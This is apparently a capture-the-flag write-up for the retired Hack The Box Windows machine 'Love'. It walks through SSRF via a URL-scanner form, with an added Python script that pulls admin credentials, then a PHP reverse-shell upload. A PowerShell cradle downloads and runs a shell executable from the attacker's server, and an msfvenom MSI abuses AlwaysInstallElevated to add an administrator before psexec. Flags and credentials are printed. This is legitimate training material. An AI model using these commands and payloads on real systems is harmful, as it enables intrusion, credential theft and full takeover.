| Name | Love |
|---|---|
| Release Date | 01 May 2021 |
| Retire Date | 07 Aug 2021 |
| OS | Windows |
| Base Points | Easy - Retired [0] |
| Rated Difficulty | (graphic) |
| Radar Graph | (graphic) |
| Tartofraise | 00 days, 00 hours, 08 mins, 48 seconds |
| celesian | 00 days, 00 hours, 18 mins, 12 seconds |
| Creator | pwnmeow |
| Pentest Workstation PDF | Love.pdf |
Again, we start with AutoRecon: sudo /home/kali/AutoRecon/src/autorecon/autorecon.py 10.10.10.239
Sidenote: newer Kali releases no longer log you in as root by default, and the UDP port scan AutoRecon runs needs raw-socket privileges, so the whole run has to go under sudo.
Several ports are open on this box and many of them serve some form of web content. The certificate pulled from HTTPS on TCP 443 lists a few hostnames, and since the web server will route requests by virtual host, we add them to /etc/hosts before going further:
sudo vi /etc/hosts
10.10.10.239 www.love.htb staging.love.htb
With that done, re-run Gobuster against the hostnames rather than the IP address, because each virtual host serves different content. Gobuster turns up nothing useful on this box, though, so we fall back to browsing manually:
http://www.love.htb
http://staging.love.htb
http://staging.love.htb/beta.php (found by clicking Demo)
http://www.love.htb:5000
So, port 5000 returns 403 Forbidden when we browse to it directly, but the Malware Scanner on staging takes a URL and fetches it from the server side. That is a server-side request forgery (SSRF) primitive rather than LFI: the request originates from the web server itself, so a URL pointing at localhost reaches services that are only exposed on loopback. Sure enough, submitting http://127.0.0.1:5000 to the scanner returns the page that was forbidden from outside, and it happens to contain admin credentials. Nice!
Vote Admin Creds admin: @LoveIsInTheAir!!!!
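Here is the same trick scripted, as an added example that is not from the original write-up or from the Voting System application. It posts a URL to the scanner on staging.love.htb, lets the web server fetch it, and pulls the credentials out of the page that comes back. The form field names (file, read) are assumptions; check the form in your browser's developer tools and adjust them. The sample page embedded in the block is constructed to match the text quoted above and is only there so the parsing can be exercised offline.

```python
#!/usr/bin/env python3
"""Reach the loopback-only service on port 5000 through the staging
"Malware Scanner" (server-side request forgery, SSRF).

Added example for this write-up, not part of the original post or of the
Voting System application. Assumed (not confirmed by the write-up): the
scanner form on beta.php posts the URL to fetch in a field named "file"
with a submit button named "read".
"""
import re
import sys
import urllib.error
import urllib.parse
import urllib.request

SCANNER_URL = "http://staging.love.htb/beta.php"  # form that fetches a URL for us
INTERNAL_URL = "http://127.0.0.1:5000"            # 403 from outside, open on loopback
URL_FIELD, SUBMIT_FIELD, SUBMIT_VALUE = "file", "read", "Scan file"  # assumed names


def build_form(target_url):
    """Encode the scanner's POST body for a given target URL."""
    return urllib.parse.urlencode(
        {URL_FIELD: target_url, SUBMIT_FIELD: SUBMIT_VALUE}).encode()


def direct_status(url, timeout=10):
    """HTTP status when we fetch a URL ourselves (expect 403 for :5000)."""
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code


def fetch_via_scanner(target_url, scanner=SCANNER_URL, timeout=15):
    """Make the web server fetch target_url on our behalf and return the
    HTML it renders (the scanner echoes the fetched content into its page)."""
    req = urllib.request.Request(scanner, data=build_form(target_url),
                                 headers={"User-Agent": "Mozilla/5.0"})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


def html_to_text(html):
    """Crude tag stripper: enough to search the rendered text for credentials."""
    text = re.sub(r"<[^>]+>", " ", html)
    return re.sub(r"\s+", " ", text).strip()


def extract_creds(html):
    """Return (user, password) from a page shaped like the :5000 admin page,
    e.g. 'Vote Admin Creds below! admin: @LoveIsInTheAir!!!!', or None."""
    m = re.search(r"Vote Admin Creds\b.*?\b(\w+): (\S+)", html_to_text(html))
    return (m.group(1), m.group(2)) if m else None


# Constructed sample of what the :5000 page looks like; not fetched from anywhere.
SAMPLE_PAGE = ("<html><body><h1>Vote Admin Creds below!</h1>"
               "<table><tr><td>admin: @LoveIsInTheAir!!!!</td></tr></table>"
               "</body></html>")


if __name__ == "__main__":
    print(f"[*] direct GET http://www.love.htb:5000 -> HTTP "
          f"{direct_status('http://www.love.htb:5000')}")
    page = fetch_via_scanner(INTERNAL_URL)
    creds = extract_creds(page)
    if creds is None:
        sys.exit("[-] scanner answered, but no credentials found; inspect the page")
    print(f"[+] via SSRF: {creds[0]}:{creds[1]}")
```

Run it from the attacking box with the hosts entries above in place; the first line confirms the 403 you get directly, the second shows what the server sees when it fetches the same port itself. Swapping INTERNAL_URL for other loopback ports is the quickest way to map what else is hiding behind the firewall.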
Now that we have admin credentials for the Voting system, we log in. Once inside, a quick searchsploit shows php/webapps/49445.py, an authenticated file upload RCE for this application that should give us a foothold. After a few attempts against different ports the exploit still fails, so here is the manual route instead. Looking around the admin portal, we can update our profile picture, and since the application runs on PHP, the upload filter is the only thing between us and code execution. I used this PHP reverse shell written for Windows, with my tun0 IP and port 1234 set in the script:
https://raw.githubusercontent.com/ivan-sincek/php-reverse-shell/master/src/php_reverse_shell.php
and set a netcat listener on 1234, a web server on 8080, and a second nc listener on 1337. Upload the PHP reverse shell as the profile picture, browse to the uploaded file so the server executes it, and the first shell lands on 1234. That shell is fragile, so from it we pull down a Windows reverse-shell executable that calls back to 1337 and run it: powershell (New-Object Net.Webclient).DownloadFile('http://<YOUR TUN0 IP>:8080/shell.exe','shell.exe') and then shell.exe, and the listener on 1337 gets a stable shell as phoebe.
```
C:\Users\Phoebe\Desktop>type user.txt
type user.txt
f940d46fc5ebd612957465d566d977d4
C:\Users\Phoebe\Desktop>whoami
whoami
love\phoebe
```
Running systeminfo and poking through the interesting files, we find database credentials for phoebe in C:\xampp\htdocs\omrs\includes\conn.php:
```php
<?php
// MySQL credentials for the voting application's database, stored in clear text
$conn = new mysqli('localhost', 'phoebe', 'HTB#9826^(_', 'votesystem');
if ($conn->connect_error) {
    die("Connection failed: " . $conn->connect_error);
}
?>
```
We keep enumerating and, through winPEAS, find that AlwaysInstallElevated is enabled. That is an easy win: when the AlwaysInstallElevated value is 1 under both HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer and HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer, Windows Installer runs any .msi a user launches with SYSTEM privileges, and winPEAS even links the write-up for the technique. An MSI that adds a local administrator is all we need:
```
msfvenom -p windows/adduser --platform windows -a x64 USER=PWNED PASS='Password1!' -f msi -o privesc.msi
```
Download it onto the box with a slightly modified version of the earlier command and launch the installer:
```
powershell (New-Object Net.Webclient).DownloadFile('http://<YOUR TUN0 IP>:8080/privesc.msi','privesc.msi')
./privesc.msi
```
Then connect with psexec.py as the new local administrator (Impacket's psexec needs admin rights on the target to drop its service binary, and hands back a SYSTEM shell):
```
┌──(kali㉿kali)-[~/Desktop/HTB/Love]
└─$ sudo python3 ./psexec.py PWNED:'Password1!'@10.10.10.239
```
Grab the root.txt flag and we're on to the next :D
```
C:\WINDOWS\system32>type C:\Users\Administrator\Desktop\root.txt
a51e897bef215b2daa16a43a93491d44
C:\WINDOWS\system32>type C:\users\phoebe\desktop\user.txt
c32fcc8c5758eefd525c268af3b3c453
```
(The user.txt value differs from the one read earlier because HTB regenerates flags per instance.)